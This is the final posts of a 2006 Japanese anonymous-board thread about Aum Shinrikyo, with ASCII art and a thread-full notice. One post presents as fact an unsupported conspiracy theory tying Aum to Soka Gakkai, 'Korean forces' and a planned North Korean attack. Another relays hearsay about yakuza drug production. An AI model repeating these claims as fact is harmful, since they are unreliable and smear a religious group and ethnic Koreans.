軍事行動の準備をしていました。1990年の総選挙に馬鹿げた立候補をして資金を
使い果たしたオウムに、資金と両宗教の朝鮮人勢力が注入されたのです。彼らは、
オウムを利用して、北朝鮮の軍事作戦に呼応した日本国内の撹乱作戦を計画して
いたのです。だからこそ、オウム事件のあちこちで「創価」の名前が出てくるの
です。オウムとは、創価の子会社だったのです。95年の末にオウムがもし
軍事行動を起していたなら、呼応した北朝鮮の南下突進が行われていたでしょう。
金正日か中国の都合で取りやめになったようですが。


992 :和井 恵:2006/08/28(月) 12:40:03 ID:J0rLCk3F
>>981
>和井も北もわざと触れないのか
>そうだよ、暴力団関係について知りたい
>避けたい話題だから、この話をフルと返事ないのかなあ

私は返事をしたと思うけどね^^

----------------------------------------------------
946 :和井 恵:2006/08/28(月) 02:17:01 ID:J0rLCk3F
>「暴力団」関係、の方の話の事ね^^

この話を聞きたいの?

947 :和井 恵:2006/08/28(月) 02:27:42 ID:J0rLCk3F
返事がないなぁ…
-----------------------------------------------------

私がある人から(元テレ朝の報道関係者)聞いている話では、

「オウムは関西の山口組系の暴力団と手を組んで、
 覚醒剤の大量生産と販売を行っていた。」

私は、93年10月に教団から離れましたが、
その少し前にガフヴァ(端本くん)本人から、

「今度、○○さんと一緒に、彼の昔の知り合いを訪ねたりして、
ヤクザの組織とのコネクションを造りに行くことになったんだ」
 ※ 「○○さん」はヤクザ出身のサマナ。

という話を直接聞いています。

993 :名無しさん@3周年:2006/08/28(月) 12:42:41 ID:GCIO4zwX
ID:lflCyLmc
       /:::::::::::::::::::::::人:::::::::::::::::::::::::\
      /:::::::::::::::::::::::::::/ ..ヽ:::::::::::::::::::::::::::ヽ
     /::::::::::::::::::::::::::::/   ヾ:::::::::::::::::::::::::::丶
     |::::::::::::::::::::::::::::/     ヽ::::::::::::::::::::::::::ヽ
    |::::::::::/::::::::::::ノ       ヽ.::::::::::::ヽ:::::::|
    |:::::::/ ̄ ̄           ̄ ̄ ̄|:::::::|
    |=ロ  -===・      ・===-  ロ=.|
    |:::::|                  .. |::::::|
     |::::::| `                 |::::::|
   (||:::::|        .(。。)       |::::::|)
  ..  |:::::| ∴∴     l l    ..∴∴ |::::::|
  ..  |:::::| ∴∴ _-- ̄`´ ̄--__ ∴∴ |::::::|
    |:::::| ∴∴  -二二二二- ∴∴ |:::::::|
    |:::::|                  |:::::::|
    |:::::::ヽ      -_    _-     ノ::::::::|
    |:::::::::丶       . ̄ ̄    /::::::::::::|
    |::::::::::| \_______/ |::::::::::::::::|

┏━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ キャンディが あらわれた!                             ┃
┃                                                  ┃
┃                                                  ┃
┗━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┛

994 :名無しさん@3周年:2006/08/28(月) 12:42:44 ID:lflCyLmc
オウムにとっては、都合の良い話である、オウムはスパイにやられた
教祖は天皇のように飾り物に過ぎず、他の団体から送り込まれた人間が
内部で力をもち、動かしていた、ということにすれば
うまくすれば、教祖の罪を軽減できる、、
教祖の見方をしたい人間の、デッチ上げじゃないか、と
いう見方をしたくなる
で、もしそんな話があるなら、なぜ教祖はそれを言わないんだ
層化に食われたとか、、

995 :名無しさん@3周年:2006/08/28(月) 12:44:28 ID:2Quf14fk
みなさん。

次はこちらでお願いしますね。

http://life7.2ch.net/test/read.cgi/psy/1156732111/

996 :名無しさん@3周年:2006/08/28(月) 12:47:29 ID:2MfmjzXJ


\               |         /
  \             |        /
             / ̄ ̄ ヽ,
            /        ',      /     _/\/\/\/|_
    \    ノ//, {0}  /¨`ヽ {0} ,ミヽ    /     \           /
     \ / く l   ヽ._.ノ   ', ゝ \       <   尊師っ   >
     / /⌒ リ   `ー'′   ' ⌒\ \    /          \
     (   ̄ ̄⌒          ⌒ ̄ _)    ̄|/\/\/\/ ̄
      ` ̄ ̄`ヽ           /´ ̄
           |            |  
  −−− ‐   ノ           |
          /            ノ        −−−−
         /           ∠_
  −−   |    f\      ノ     ̄`丶.
        |    |  ヽ__ノー─-- 、_   )    − _
.        |  |            /  /
         | |          ,'  /
    /  /  ノ           |   ,'    \
      /   /             |  /      \
   /_ノ /              ,ノ 〈           \
    (  〈              ヽ.__ \        \
     ヽ._>              \__)






997 :阿左谷北:2006/08/28(月) 12:47:29 ID:wE0ca/Bz
プレステージが流れたじゃないか!
キャンディのせいだ〜!

998 :名無しさん@3周年:2006/08/28(月) 12:48:04 ID:lflCyLmc
もし、それが本当なら、教祖を助けたい人間は
お祈りばかりしてないで、命がけでそこらへん突っ込むべきでないのかね
草加は強大だが、オウム信者はグルのために死ねる

誰のいうことが一番事実に近いんだろう
漏れも、ここでいろいろ言うと、バカに見えるのだろうが
まず、オウムの言うことは一番あてにならない
彼らは平気でウソをつく
警察は、上の人間のいうがままであって、下は権力がないゆえに役に立たないと
ジャーナリストが一番、ものを言える立場であろうか


999 :名無しさん@3周年:2006/08/28(月) 12:48:50 ID:2MfmjzXJ


\               |         /
  \             |        /
             / ̄ ̄ ヽ,
            /        ',      /     _/\/\/\/|_
    \    ノ//, {0}  /¨`ヽ {0} ,ミヽ    /     \           /
     \ / く l   ヽ._.ノ   ', ゝ \       <   終わり   >
     / /⌒ リ   `ー'′   ' ⌒\ \    /          \
     (   ̄ ̄⌒          ⌒ ̄ _)    ̄|/\/\/\/ ̄
      ` ̄ ̄`ヽ           /´ ̄
           |            |  
  −−− ‐   ノ           |
          /            ノ        −−−−
         /           ∠_
  −−   |    f\      ノ     ̄`丶.
        |    |  ヽ__ノー─-- 、_   )    − _
.        |  |            /  /
         | |          ,'  /
    /  /  ノ           |   ,'    \
      /   /             |  /      \
   /_ノ /              ,ノ 〈           \
    (  〈              ヽ.__ \        \
     ヽ._>              \__)






1000 :阿左谷北:2006/08/28(月) 12:49:27 ID:wE0ca/Bz
仏教よりプレステージ

1001 :1001:Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。

415 KB
★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.02 2018/11/22 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)